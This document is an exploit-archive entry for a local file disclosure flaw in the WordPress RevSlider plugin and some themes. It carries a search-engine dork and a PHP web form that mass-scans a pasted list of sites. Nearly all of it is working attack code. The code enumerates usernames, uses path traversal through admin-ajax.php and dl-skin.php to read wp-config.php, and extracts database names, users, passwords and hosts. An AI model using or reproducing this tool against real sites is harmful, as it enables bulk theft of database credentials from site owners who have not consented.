# Exploit Title: [Wordpress RevSlider Plugin LFD]
# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image
# Date: 12/29/14
# Exploit Author: FarbodEZRaeL
# Vendor Homepage: iranhack.org
# Software Link: wordpress.org
# Tested on: windows
#Exploit:
<html>
<head>
<title>Exploits Wordpress</title>
</head>
<body style="background-color: rebeccapurple;">

<pre><p><center style="color: aqua;">

=============================================================
=       Exploits Wordpress RevSlider Plugin LFD Vuln        =
=                                                           =
=                    Coded by FarbodEZRaeL                  =
=                    Iranhack Security team                 =
=                       www.iranhack.org                    =
=                     Fix bug Other Version                 =
=============================================================

<pre><href>
<form method='POST'>
<textarea name='sites' cols='45' rows='0'></textarea>
<br>
<input type='submit' value='Exploit' />
</form>

<?php

# Coded by FarbodEZRaeL
# Exploits Wordpress RevSlider Plugin LFD Vuln
@set_time_limit(0);
error_reporting(0);
$sites = explode("\r\n", $_POST['sites']);

foreach($sites as $site) {

$site = trim($site);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.0)");
$get = curl_exec($ch);
curl_close($ch);
if(preg_match("#WordPress (.*?)/>#", $get, $version)){
$str = str_replace('/>', "", $version[0]);
$str = str_replace('"', "", $str);
}
$users = @file_get_contents("$site/?author=1");
preg_match('/<title>;(.*?)<\/title>/si',$users,$user);
$wpuser = explode('|',$user[1]);
echo " <br>======================================</br>";
echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version :
".$str."<br>";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,
"$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);
if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";

}

$lt =
array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php");
foreach($lt as $l){
$site = "$site/$l";
$process = curl_init($site);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
7.0; Windows NT 6.0)");
curl_setopt($process, CURLOPT_HEADER, TRUE);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_POSTFIELDS,
"_mysite_download_skin=../../../../../wp-config.php");
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
if(preg_match("#DB_USER#i",$return)){
preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
break;
echo " <br>-----------------------------------</br>";
ob_implicit_flush(true);
ob_end_flush();
}
}
}

?>
</pre></p></center>